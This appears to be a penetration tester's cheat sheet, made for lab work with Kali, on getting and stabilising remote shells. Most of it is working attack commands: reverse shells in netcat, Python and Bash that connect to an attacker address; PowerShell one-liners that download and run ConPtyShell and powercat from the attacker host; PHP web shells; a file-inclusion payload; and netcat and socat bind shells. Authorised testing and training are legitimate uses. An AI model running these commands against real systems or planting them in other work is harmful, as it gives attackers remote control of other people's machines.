Shells
Reverse Shell Generation
Resources
- https://revshells.com — generate shells with a given port and IP (change shell from
cmdto/bin/bashas needed)
Linux Shells
Busybox netcat:
busybox nc $kaliIP $kaliPort -e sh
Python reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$kaliIP",$kaliPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash:
bash -c "bash -i >& /dev/tcp/$kaliIP/$kaliPort 0>&1"
# URL encoded for use in curl/web shell:
bash+-c+"bash+-i+>%26+/dev/tcp/$kaliIP/$kaliPort+0>%261"
Windows Shells
ConPtyShell (fully interactive Windows shell):
powershell IEX(IWR http://$kaliIP/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell $kaliIP $kaliPort
Requires serving Invoke-ConPtyShell.ps1 from port 80.
Reference: https://github.com/antonioCoco/ConPtyShell/blob/master/README.md
Powercat:
IEX(New-Object System.Net.WebClient).DownloadString('http://$kaliIP:$kaliPort/powercat.ps1'); powercat -c $kaliIP -p $kaliPort -e powershell
Requires serving powercat.ps1 from port 80.
Web Shells
PHP simple web shell:
<?php echo shell_exec($_GET['cmd']); ?>
Usage: http://target.com/shell.php?cmd=whoami
PHP system web shell:
<?php system($_GET['cmd']); ?>
LFI PHP wrapper:
http://[IP]/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
Upgrading to Fully Interactive Shell
Python PTY Method
Quick version:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Full method (preserves screen size, arrow keys, CTRL+C, etc.):
# Step 1: Spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Step 2: Background the shell
CTRL+Z
# Step 3: Get your terminal settings (note TERM and rows/columns)
echo $TERM
stty -a
# Step 4: Configure raw mode
stty raw -echo
# Step 5: Bring shell back to foreground
fg
# Step 6: Reset and export settings (use values from stty -a)
reset
export SHELL=/bin/bash
export TERM=xterm-256color
stty rows 38 columns 116
One-liner version (inside nc session):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then:
CTRL+Z; stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 36 columns 102; reset;
Socat Method
On Kali (listener):
sudo socat file:'tty',raw,echo=0 tcp-listen:443
On target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$kaliIP:443
Reference: https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys
Bind Shells
Bind shells listen on the target and accept incoming connections (useful when outbound connections are blocked).
Netcat bind shell (Linux):
nc -lvnp $port -e /bin/bash
Netcat bind shell (Windows):
nc -lvnp $port -e cmd.exe
Connect from attacker:
nc $targetIP $port
Socat bind shell:
# Target
socat tcp-listen:$port,reuseaddr exec:/bin/bash
# Attacker
socat tcp:$targetIP:$port -